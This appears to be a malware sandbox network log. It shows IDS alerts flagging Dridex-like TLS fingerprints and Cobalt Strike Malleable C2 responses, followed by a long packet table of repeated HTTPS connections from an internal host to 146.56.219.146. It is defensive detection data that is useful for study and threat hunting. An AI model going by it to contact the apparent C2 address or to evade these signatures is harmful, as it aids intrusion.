2024-12-18T22:53:21.968112+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49799 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:22.780642+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49799 | TCP
2024-12-18T22:53:29.435887+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49816 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:30.195703+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49816 | TCP
2024-12-18T22:53:36.668368+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49835 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:37.399876+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49835 | TCP
2024-12-18T22:53:43.978487+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49853 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:44.714622+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49853 | TCP
2024-12-18T22:53:51.218394+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49869 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:51.994563+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49869 | TCP
2024-12-18T22:53:58.505604+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49886 | 146.56.219.146 | 443 | TCP
2024-12-18T22:53:59.239615+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 146.56.219.146 | 443 | 192.168.2.4 | 49886 | TCP
2024-12-18T22:54:05.618971+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49905 | 146.56.219.146 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 22:52:01.349164963 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:01.349199057 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:01.349323034 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:01.360709906 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:01.360727072 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:03.210597038 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:03.210751057 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:03.672658920 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:03.672684908 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:03.673738003 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:03.673810959 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:03.686572075 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:03.727359056 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.210458994 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.210558891 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.221580029 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.221602917 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.221681118 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.221693993 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.221743107 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.425523996 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.425774097 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.425789118 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.425851107 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.453901052 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.454140902 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.454149961 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.454226017 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.479160070 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.479331017 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.479341030 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.479394913 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.613475084 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.613672972 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.613704920 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.614113092 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.652745008 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.652935028 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.652955055 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.653033018 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.677866936 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.678062916 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.678073883 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.678241014 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.710832119 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.711010933 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.711020947 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.711081028 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.735569954 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.735663891 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.735675097 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.735827923 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.759457111 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.759638071 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.759648085 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.759726048 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.787254095 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.787503004 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.787513971 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.787563086 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.843909025 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.844219923 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.844253063 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.844345093 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.859724045 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.859899044 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.859910011 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.859965086 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.880713940 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.880872011 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.880881071 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.880932093 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.894196987 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.894330978 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.894340038 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.894530058 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.903481007 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.903583050 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.903592110 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.903779984 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.915386915 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.915543079 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.915576935 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.915751934 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.924407005 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.924597979 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.924607038 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.924665928 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.935447931 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.935551882 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.935561895 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.935606003 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.979587078 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.980062962 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.980076075 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.980144024 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.986665964 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.986958981 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.986968040 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.987042904 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.998096943 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.998209953 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:04.998223066 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:04.998275995 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.006747961 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.006839991 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.006851912 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.006941080 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.015728951 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.015819073 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.015827894 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.015938997 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.040385962 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.040601015 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.040611982 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.040673018 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.054730892 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.054878950 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.054902077 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.054970980 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.063452005 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.065241098 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.065258980 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.065320015 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.071693897 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.071788073 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.071820021 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.072004080 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.079427958 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.079519987 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.079530001 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.079610109 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.087055922 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.087204933 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.087215900 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.087284088 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.105724096 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.105871916 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.105881929 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.105973005 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.112473965 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.112750053 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.112759113 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.112813950 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.117882013 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.117965937 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.117974997 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.118076086 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.124408960 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.124685049 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.124695063 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.124815941 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.129239082 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.129365921 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.129374981 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.129484892 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.134758949 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.134859085 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.134869099 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.134917021 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.139260054 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.139338017 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.139354944 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.139461040 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.145045996 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.145334959 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.145344973 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.145402908 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.149619102 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.149738073 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.149749041 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.149808884 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.153737068 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.153915882 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.153923988 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.154004097 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.229001999 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.229304075 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.229317904 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.229425907 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.233251095 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.233575106 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.233584881 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.233669043 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.247896910 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.247997999 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.248008013 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.248157978 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.251378059 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.251462936 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.251472950 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.251616001 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.255568981 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.255656958 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.255666018 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.255754948 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.258732080 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.258807898 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.258816957 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.258858919 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.261837006 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.261914015 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.261924028 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.261966944 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.265924931 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.266000986 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.266010046 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.266055107 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.268784046 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.268857956 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.268867016 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.268912077 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.271778107 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.271851063 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.271858931 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.271919012 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.275504112 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.275583029 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.275598049 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.275641918 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.278976917 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.279053926 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.279068947 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.279113054 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.281470060 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.281548977 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.281557083 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.281600952 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.284251928 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.284342051 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.284360886 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.284403086 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.287674904 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.287754059 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.287765026 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.287807941 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.290314913 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.290395975 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.290402889 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.290446997 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.290474892 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.290534019 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.290664911 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.290682077 CET | 443 | 49731 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.290698051 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.290735006 CET | 49731 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.315911055 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.316025019 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:05.316133022 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.316361904 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:05.316395998 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.199949980 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.200083971 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.201150894 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.201205015 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.202534914 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.202588081 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.946510077 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.946696997 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.947412968 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.947498083 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.947535038 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.947573900 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:07.947597980 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.947638988 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.959676981 CET | 49732 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:07.959709883 CET | 443 | 49732 | 146.56.219.146 | 192.168.2.4
Dec 18, 2024 22:52:12.898381948 CET | 49733 | 443 | 192.168.2.4 | 146.56.219.146
Dec 18, 2024 22:52:12.898488998 CET | 443 | 49733 | 146.56.219.146 | 192.168.2.4
